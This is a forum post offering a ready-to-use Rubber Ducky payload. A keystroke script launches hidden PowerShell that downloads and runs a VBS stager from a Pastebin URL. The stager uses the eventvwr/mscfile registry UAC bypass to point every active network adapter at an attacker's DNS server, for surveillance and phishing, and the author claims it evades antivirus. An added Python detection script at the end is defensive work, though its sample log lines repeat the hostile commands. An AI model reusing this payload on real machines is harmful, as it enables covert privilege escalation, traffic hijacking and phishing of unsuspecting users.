
Staged DNS attack using Rubber Ducky


Skiddie


This is a payload mainly based on the UAC bypassing download and execute payload generator I released not so long ago.

I strongly suggest you check that out first.

https://www.youtube.com/watch?v=fmRRX7-G4lc

https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky

 

So the goal of this payload is to add a new primary "malicious" DNS server for all active network devices on any Windows computer. To do this we use the UAC bypass method used in the above payload, but in a different payload (also in the same "Visual Basic" script format).

The "gain" from this would be to surveil DNS requests and/or set up phishing websites targeted/customized for those requests/victim.

So for the ducky script we are going to be using the following code

DELAY 1000
GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('[SOURCE]', '%temp%/[NAME]'); %temp%/[NAME]
ENTER

You wanna replace the "[NAME]" with a random name value ending in the .vbs extension (Example: update.vbs)

You wanna replace the [SOURCE] with the URL for the stager payload source (below), preferably hosted on Pastebin

(Example: http://www.pastebin.com/raw/NEyDVtER <- /raw/ is IMPORTANT)

 


Here is the .vbs payload. 

 

Dim objWMIService, objShell, colItems, objItem
Set objShell = CreateObject("Wscript.Shell")
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapter WHERE NetConnectionStatus = 2")

'For each active network adapter
For Each objItem in colItems

'Write UAC bypass regkey with the cmd command as value
	CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "cmd /c netsh interface ipv4 set dns " + chr(34) + objItem.NetConnectionID + chr(34) + " static X.X.X.X primary" ,"REG_SZ"
'Trigger UAC bypass
	CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true
	
'Reset regkey 
	GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\",""
	
Next

 

Here you wanna replace "X.X.X.X" with your malicious DNS server. 


If you need help setting up the DNS server you can have a look at this tutorial -> https://blog.heckel.xyz/2013/07/18/how-to-dns-spoofing-with-a-simple-dns-server-using-dnsmasq/


This again just shows how fast, effective, invisible and powerless staged payloads for the rubber ducky are, especially with the UAC bypass integrated.


Also, from what I can tell this bypasses all AVs...


Best Regards


~Skiddie

 

 

Edited by Skiddie
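For defenders, the behaviours described in the post above leave a recognisable trail: a PowerShell download of a .vbs file into %temp%, a write under the per-user mscfile\shell\open\command key, a launch of eventvwr.exe, and a netsh command setting a static DNS server. The following is an added example, not code from the original post or its author; the "key=value" log layout, rule names, host names and resolver addresses are constructed assumptions.

```python
import re
from collections import defaultdict

# Assumption: the site's legitimate resolvers (constructed values).
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.0.54"}

# One pattern per behaviour the post describes. Rule names are hypothetical.
RULES = {
    "stager_download": re.compile(r"downloadfile\(.*%temp%[/\\][\w.-]+\.vbs", re.I),
    "mscfile_hijack": re.compile(r"\\mscfile\\shell\\open\\command", re.I),
    "eventvwr_launch": re.compile(r"image=\S*\\eventvwr\.exe", re.I),
    "dns_change": re.compile(
        r"netsh\s+interface\s+ipv4\s+set\s+dns\b.*?\bstatic\s+(\S+)", re.I),
}

# Constructed sample events in a made-up "key=value" layout, not real telemetry.
SAMPLE = [
    r"host=WS01 event=proc image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.invalid/raw/PLACEHOLDER', '%temp%/update.vbs'); %temp%/update.vbs",
    r"host=WS01 event=reg target=HKU\S-1-5-21-0-0-0-1001_Classes\mscfile\shell\open\command\(Default)",
    r"host=WS01 event=proc image=C:\Windows\System32\eventvwr.exe cmd=eventvwr.exe",
    r'host=WS01 event=proc image=C:\Windows\System32\netsh.exe cmd=netsh interface ipv4 set dns "Ethernet" static 192.0.2.53 primary',
    r'host=WS02 event=proc image=C:\Windows\System32\netsh.exe cmd=netsh interface ipv4 set dns "Ethernet" static 10.0.0.53 primary',
    r"host=WS03 event=proc image=C:\Windows\System32\eventvwr.exe cmd=eventvwr.exe",
]

def scan(lines):
    """Return {host: set of rule names hit}. A DNS change only counts
    when the new resolver is not in APPROVED_RESOLVERS."""
    hits = defaultdict(set)
    for line in lines:
        host = re.search(r"host=(\S+)", line)
        if not host:
            continue
        for name, rx in RULES.items():
            m = rx.search(line)
            if m and not (name == "dns_change" and m.group(1) in APPROVED_RESOLVERS):
                hits[host.group(1)].add(name)
    return dict(hits)

def verdict(rules_hit):
    """'high' when the handler hijack and an unapproved DNS change occur on
    the same host; 'review' for any other hit; 'clean' for none."""
    if {"mscfile_hijack", "dns_change"} <= rules_hit:
        return "high"
    return "review" if rules_hit else "clean"

if __name__ == "__main__":
    for host, rules in scan(SAMPLE).items():
        print(host, verdict(rules), sorted(rules))
```

A lone eventvwr.exe launch or an administrator pointing an adapter at an approved resolver stays below "high"; it is the combination on one host that is rare in normal use.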